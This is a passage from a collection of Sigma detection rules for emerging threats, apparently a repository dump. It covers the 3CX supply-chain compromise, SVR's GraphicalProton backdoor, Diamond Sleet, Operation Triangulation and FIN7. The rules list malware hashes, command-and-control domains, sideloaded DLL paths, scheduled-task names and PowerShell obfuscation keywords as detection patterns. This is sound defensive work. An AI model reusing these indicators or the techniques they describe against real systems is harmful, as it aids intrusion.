'SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC'\n            - 'SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02'\n            - 'SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE'\n            - 'SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859'\n            - 'SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187'\n            - 'SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA'\n            - 'MD5=BB915073385DD16A846DFA318AFA3C19'\n            - 'MD5=08D79E1FFFA244CC0DC61F7D2036ACA9'\n            - 'MD5=4965EDF659753E3C05D800C6C8A23A7A'\n            # 3CX Desktop 18.12.416\n            - 'SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405'\n            - 'SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734'\n            - 'SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203'\n            - 'SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1'\n            - 'SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB'\n            - 'SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5'\n            - 'MD5=9833A4779B69B38E3E51F04E395674C6'\n            - 'MD5=704DB9184700481A56E5100FB56496CE'\n            - 'MD5=8EE6802F085F7A9DF7E0303E65722DC0'\n            # 3CXDesktopApp MSI\n            - 'SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868'\n            - 'SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983'\n            - 'SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA'\n            - 'SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E'\n            - 'MD5=F3D4144860CA10BA60F7EF4D176CC736'\n            - 'MD5=0EEB1C0133EB4D571178B2D9D14CE3E9'\n    selection_pe_1:\n        - OriginalFileName: '3CXDesktopApp.exe'\n        - Image|endswith: '\\3CXDesktopApp.exe'\n        - Product: '3CX Desktop App'\n    selection_pe_2:\n        FileVersion|contains: '18.12.'\n    condition: all of selection_pe_* or selection_hashes\nfalsepositives:\n    - Legitimate usage of 3CXDesktopApp\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml",
    "content": "title: Potential Suspicious Child Process Of 3CXDesktopApp\nid: 63f3605b-979f-48c2-b7cc-7f90523fed88\nrelated:\n    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2\n      type: similar\n    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH\n      type: similar\n    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2\n      type: similar\n    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2\n      type: similar\n    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec\n      type: similar\n    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update\n      type: similar\n    - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad\n      type: similar\nstatus: test\ndescription: Detects potential suspicious child processes of \"3CXDesktopApp.exe\". Which could be related to the 3CXDesktopApp supply chain compromise\nreferences:\n    - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/\n    - https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-29\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\3CXDesktopApp.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml",
    "content": "title: Potential Compromised 3CXDesktopApp Update Activity\nid: e7581747-1e44-4d4b-85a6-0db0b4a00f2a\nrelated:\n    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2\n      type: similar\n    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH\n      type: similar\n    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2\n      type: similar\n    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2\n      type: similar\n    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec\n      type: similar\n    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc\n      type: similar\n    - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad\n      type: similar\nstatus: test\ndescription: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software\nreferences:\n    - https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/\n    - https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-29\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\3CXDesktopApp\\app\\update.exe'\n        CommandLine|contains|all:\n            - '--update'\n            - 'http'\n            - '/electron/update/win32/18.12'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/proxy_malware_3cx_compromise_c2_beacon_activity.yml",
    "content": "title: Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy\nid: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26\nrelated:\n    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH\n      type: similar\n    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2\n      type: similar\n    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2\n      type: similar\n    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec\n      type: similar\n    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc\n      type: similar\n    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update\n      type: similar\n    - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad\n      type: similar\nstatus: test\ndescription: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise\nreferences:\n    - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-29\nmodified: 2023-05-18\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-host|contains:\n            - 'akamaicontainer.com'\n            - 'akamaitechcloudservices.com'\n            - 'azuredeploystore.com'\n            - 'azureonlinecloud.com'\n            - 'azureonlinestorage.com'\n            - 'dunamistrd.com'\n            - 'glcloudservice.com'\n            - 'journalide.org'\n            - 'msedgepackageinfo.com'\n            - 'msstorageazure.com'\n            - 'msstorageboxes.com'\n            - 'officeaddons.com'\n            - 'officestoragebox.com'\n            - 'pbxcloudeservices.com'\n            - 'pbxphonenetwork.com'\n            - 'pbxsources.com'\n            - 'qwepoi123098.com'\n            - 'sbmsa.wiki'\n            - 'sourceslabs.com'\n            - 'visualstudiofactory.com'\n            - 'zacharryblogs.com'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/proxy_malware_3cx_compromise_susp_ico_requests.yml",
    "content": "title: Potential Compromised 3CXDesktopApp ICO C2 File Download\nid: 76bc1601-9546-4b75-9419-06e0e8d10651\nrelated:\n    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2\n      type: similar\n    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2\n      type: similar\n    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2\n      type: similar\n    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec\n      type: similar\n    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc\n      type: similar\n    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update\n      type: similar\n    - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad\n      type: similar\nstatus: test\ndescription: Detects potential malicious .ICO files download from a compromised 3CXDesktopApp via web requests to the the malicious Github repository\nreferences:\n    - https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/\n    - https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-31\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains|all:\n            - 'IconStorages/images/main/icon'\n            - '.ico'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Cozy-Bear/image_load_apt_cozy_bear_graphical_proton_dlls.yml",
    "content": "title: DLL Names Used By SVR For GraphicalProton Backdoor\nid: e64c8ef3-9f98-40c8-b71e-96110991cb4c\nstatus: test\ndescription: Hunts known SVR-specific DLL names.\nreferences:\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\nauthor: CISA\ndate: 2023-12-18\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\AclNumsInvertHost.dll'\n            - '\\AddressResourcesSpec.dll'\n            - '\\BlendMonitorStringBuild.dll'\n            - '\\ChildPaletteConnected.dll'\n            - '\\DeregisterSeekUsers.dll'\n            - '\\HandleFrequencyAll.dll'\n            - '\\HardSwapColor.dll'\n            - '\\LengthInMemoryActivate.dll'\n            - '\\ModeBitmapNumericAnimate.dll'\n            - '\\ModeFolderSignMove.dll'\n            - '\\ParametersNamesPopup.dll'\n            - '\\PerformanceCaptionApi.dll'\n            - '\\ScrollbarHandleGet.dll'\n            - '\\UnregisterAncestorAppendAuto.dll'\n            - '\\WowIcmpRemoveReg.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml",
    "content": "title: Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor\nid: 8fa65166-f463-4fd2-ad4f-1436133c52e1\nrelated:\n    - id: 2bfc1373-0220-4fbd-8b10-33ddafd2a142\n      type: similar\nstatus: test\ndescription: Hunts for known SVR-specific scheduled task names\nauthor: CISA\nreferences:\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\ndate: 2023-12-18\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    service: security\n    product: windows\ndetection:\n    selection:\n        EventID:\n            - 4698\n            - 4699\n            - 4702\n        TaskName:\n            - '\\defender'\n            - '\\Microsoft\\DefenderService'\n            - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck'\n            - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck'\n            - '\\Microsoft\\Windows\\ATPUpd'\n            - '\\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Update'\n            - '\\Microsoft\\Windows\\DefenderUPDService'\n            - '\\Microsoft\\Windows\\IISUpdateService'\n            - '\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask'\n            - '\\Microsoft\\Windows\\WiMSDFS'\n            - '\\Microsoft\\Windows\\Windows Defender\\Defender Update Service'\n            - '\\Microsoft\\Windows\\Windows Defender\\Service Update'\n            - '\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting'\n            - '\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting'\n            - '\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart'\n            - '\\Microsoft\\Windows\\WindowsDefenderService'\n            - '\\Microsoft\\Windows\\WindowsDefenderService2'\n            - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'\n            - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check'\n            - '\\WindowUpdate'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml",
    "content": "title: Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler\nid: 2bfc1373-0220-4fbd-8b10-33ddafd2a142\nrelated:\n    - id: 8fa65166-f463-4fd2-ad4f-1436133c52e1 # Security-Audting Eventlog\n      type: similar\nstatus: test\ndescription: Hunts for known SVR-specific scheduled task names\nauthor: CISA\nreferences:\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\ndate: 2023-12-18\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: taskscheduler\n    definition: 'Requirements: The \"Microsoft-Windows-TaskScheduler/Operational\" is disabled by default and needs to be enabled in order for this detection to trigger'\ndetection:\n    selection:\n        EventID:\n            - 129 # Task Created\n            - 140 # Task Updated\n            - 141 # Task Deleted\n        TaskName:\n            - '\\defender'\n            - '\\Microsoft\\DefenderService'\n            - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck'\n            - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck'\n            - '\\Microsoft\\Windows\\ATPUpd'\n            - '\\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Update'\n            - '\\Microsoft\\Windows\\DefenderUPDService'\n            - '\\Microsoft\\Windows\\IISUpdateService'\n            - '\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask'\n            - '\\Microsoft\\Windows\\WiMSDFS'\n            - '\\Microsoft\\Windows\\Windows Defender\\Defender Update Service'\n            - '\\Microsoft\\Windows\\Windows Defender\\Service Update'\n            - '\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting'\n            - '\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting'\n            - '\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart'\n            - '\\Microsoft\\Windows\\WindowsDefenderService'\n            - '\\Microsoft\\Windows\\WindowsDefenderService2'\n            - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'\n            - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check'\n            - '\\WindowUpdate'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Diamond-Sleet/README.md",
    "content": "# Diamond Sleet APT\n\n## Summary\n\nDiamond Sleet (ZINC) is a North Korean nation-state threat actor that prioritizes espionage, data theft, financial gain, and network destruction. The actor typically targets media, IT services, and defense-related entities around the world.\n\nYou can find more information on the threat in the following articles:\n\n- [Multiple North Korean threat actors exploiting the TeamCity CVE-2023-42793 vulnerability](https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/)\n\n## Rules\n\n- [Diamond Sleet APT DNS Communication Indicators](./dns_query_win_apt_diamond_steel_indicators.yml)\n- [Diamond Sleet APT File Creation Indicators](./file_event_win_apt_diamond_sleet_indicators.yml)\n- [Diamond Sleet APT DLL Sideloading Indicators](./image_load_apt_diamond_sleet_side_load.yml)\n- [Diamond Sleet APT Process Activity Indicators](./proc_creation_win_apt_diamond_sleet_indicators.yml)\n- [Diamond Sleet APT Scheduled Task Creation - Registry](./registry_event_apt_diamond_sleet_scheduled_task.yml)\n- [Diamond Sleet APT Scheduled Task Creation](./win_security_apt_diamond_sleet_scheduled_task.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Diamond-Sleet/dns_query_win_apt_diamond_steel_indicators.yml",
    "content": "title: Diamond Sleet APT DNS Communication Indicators\nid: fba38e0f-4607-4344-bb8f-a4b50cdeef7f\nstatus: test\ndescription: Detects DNS queries related to Diamond Sleet APT activity\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-24\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains:\n            - '3dkit.org'\n            - 'dersmarketim.com'\n            - 'galerielamy.com'\n            - 'olidhealth.com'\n    condition: selection\nfalsepositives:\n    - Might generate some false positive if triggered by a user during investigation for example.\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Diamond-Sleet/file_event_win_apt_diamond_sleet_indicators.yml",
    "content": "title: Diamond Sleet APT File Creation Indicators\nid: e1212b32-55ff-4dfb-a595-62b572248056\nstatus: test\ndescription: Detects file creation activity that is related to Diamond Sleet APT activity\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-24\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - ':\\ProgramData\\4800-84DC-063A6A41C5C'\n            - ':\\ProgramData\\clip.exe'\n            - ':\\ProgramData\\DSROLE.dll'\n            - ':\\ProgramData\\Forest64.exe'\n            - ':\\ProgramData\\readme.md'\n            - ':\\ProgramData\\Version.dll'\n            - ':\\ProgramData\\wsmprovhost.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Diamond-Sleet/image_load_apt_diamond_sleet_side_load.yml",
    "content": "title: Diamond Sleet APT DLL Sideloading Indicators\nid: d1b65d98-37d7-4ff6-b139-2d87c1af3042\nstatus: test\ndescription: Detects DLL sideloading activity seen used by Diamond Sleet APT\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-24\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection_1:\n        Image|endswith: ':\\ProgramData\\clip.exe'\n        ImageLoaded|endswith: ':\\ProgramData\\Version.dll'\n    selection_2:\n        Image|endswith: ':\\ProgramData\\wsmprovhost.exe'\n        ImageLoaded|endswith: ':\\ProgramData\\DSROLE.dll'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml",
    "content": "title: Diamond Sleet APT Process Activity Indicators\nid: b5495d8d-24ad-4a44-8caf-ceae9a07a5c2\nstatus: test\ndescription: Detects process creation activity indicators related to Diamond Sleet APT\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-24\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: ' uTYNkfKxHiZrx3KJ'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml",
    "content": "title: Diamond Sleet APT Scheduled Task Creation - Registry\nid: 9f9f92ba-5300-43a4-b435-87d1ee571688\nstatus: test\ndescription: |\n    Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-24\ntags:\n    - attack.defense-evasion\n    - attack.t1562\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\'\n            - 'Windows TeamCity Settings User Interface'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml",
    "content": "title: Diamond Sleet APT Scheduled Task Creation\nid: 3b8e5084-4de9-449a-a40d-0e11014f2e2d\nstatus: test\ndescription: |\n    Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-24\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1053.005\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\n    definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.'\ndetection:\n    selection:\n        EventID: 4698\n        TaskName: '\\Windows TeamCity Settings User Interface'\n        TaskContent|contains: 'uTYNkfKxHiZrx3KJ'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/EquationGroup/net_dns_apt_equation_group_triangulation_c2_coms.yml",
    "content": "title: Potential Operation Triangulation C2 Beaconing Activity - DNS\nid: 7fc30d63-728d-48d9-ad6f-14d14f4accf7\nrelated:\n    - id: aa03c712-75c6-438b-8d42-de88f2427e09 # Proxy C2\n      type: similar\nstatus: test\ndescription: Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB\nreferences:\n    - https://securelist.com/operation-triangulation/109842/\n    - https://www-fsb-ru.translate.goog/fsb/press/message/single.htm!id=10439739@fsbMessage.html?_x_tr_sch=http&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=de&_x_tr_pto=wapp\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-06-01\ntags:\n    - attack.command-and-control\n    - attack.g0020\n    - detection.emerging-threats\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query:\n            - 'addatamarket.net'\n            - 'ans7tv.net'\n            - 'anstv.net'\n            - 'backuprabbit.com'\n            - 'businessvideonews.com'\n            - 'cloudsponcer.com'\n            - 'datamarketplace.net'\n            - 'growthtransport.com'\n            - 'mobilegamerstats.com'\n            - 'snoweeanalytics.com'\n            - 'tagclick-cdn.com'\n            - 'topographyupdates.com'\n            - 'unlimitedteacup.com'\n            - 'virtuallaughing.com'\n            - 'web-trackers.com'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/EquationGroup/proxy_apt_equation_group_triangulation_c2_coms.yml",
    "content": "title: Potential Operation Triangulation C2 Beaconing Activity - Proxy\nid: aa03c712-75c6-438b-8d42-de88f2427e09\nrelated:\n    - id: 7fc30d63-728d-48d9-ad6f-14d14f4accf7 # DNS C2\n      type: similar\nstatus: test\ndescription: Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB\nreferences:\n    - https://securelist.com/operation-triangulation/109842/\n    - https://www-fsb-ru.translate.goog/fsb/press/message/single.htm!id=10439739@fsbMessage.html?_x_tr_sch=http&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=de&_x_tr_pto=wapp\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-06-01\ntags:\n    - attack.command-and-control\n    - attack.g0020\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-host|contains:\n            - 'addatamarket.net'\n            - 'ans7tv.net'\n            - 'anstv.net'\n            - 'backuprabbit.com'\n            - 'businessvideonews.com'\n            - 'cloudsponcer.com'\n            - 'datamarketplace.net'\n            - 'growthtransport.com'\n            - 'mobilegamerstats.com'\n            - 'snoweeanalytics.com'\n            - 'tagclick-cdn.com'\n            - 'topographyupdates.com'\n            - 'unlimitedteacup.com'\n            - 'virtuallaughing.com'\n            - 'web-trackers.com'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/FIN7/README.md",
    "content": "# FIN7 Targets Veeam Backup Servers\n\n## Summary\n\nWithSecure Labs reported on the 26th of April 2023 on attacks their intelligence teams identified in late March 2023 against internet-facing servers running Veeam Backup & Replication software.\n\nYou can find more information on the threat in the following articles:\n\n- [FIN7 tradecraft seen in attacks against Veeam backup servers](https://labs.withsecure.com/publications/fin7-target-veeam-servers)\n\n## Rules\n\n- [Potential APT FIN7 Related PowerShell Script Created](./file_event_win_apt_fin7_powershell_scripts_naming_convention.yml)\n- [Potential APT FIN7 POWERHOLD Execution](./posh_ps_apt_fin7_powerhold.yml)\n- [Potential POWERTRASH Script Execution](./posh_ps_apt_fin7_powertrash_execution.yml)\n- [Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity](./proc_creation_win_apt_fin7_powertrash_lateral_movement.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/FIN7/file_event_win_apt_fin7_powershell_scripts_naming_convention.yml",
    "content": "title: Potential APT FIN7 Related PowerShell Script Created\nid: a88d9f45-ec8a-4b0e-85ee-c9f6a65e9128\nstatus: test\ndescription: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.execution\n    - attack.g0046\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        - TargetFilename|endswith: '_64refl.ps1'\n        - TargetFilename: 'host_ip.ps1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml",
    "content": "title: Potential APT FIN7 POWERHOLD Execution\nid: 71c432c4-e4da-4eab-ba49-e60ea9a81bca\nstatus: test\ndescription: Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.g0046\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - '$env:APPDATA'\n            - 'function MainPayload'\n            - '::WriteAllBytes'\n            - 'wscript.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powertrash_execution.yml",
    "content": "title: Potential POWERTRASH Script Execution\nid: 4e19528a-f081-40dd-be09-90c39352bd64\nstatus: test\ndescription: Detects potential execution of the PowerShell script POWERTRASH\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.g0046\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'IO.Compression.DeflateStream'\n            - 'IO.MemoryStream'\n            - '::FromBase64String'\n            - 'GetDelegateForFunctionPointer'\n            - '.Invoke()'\n            - 'GlobalAssemblyCache'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml",
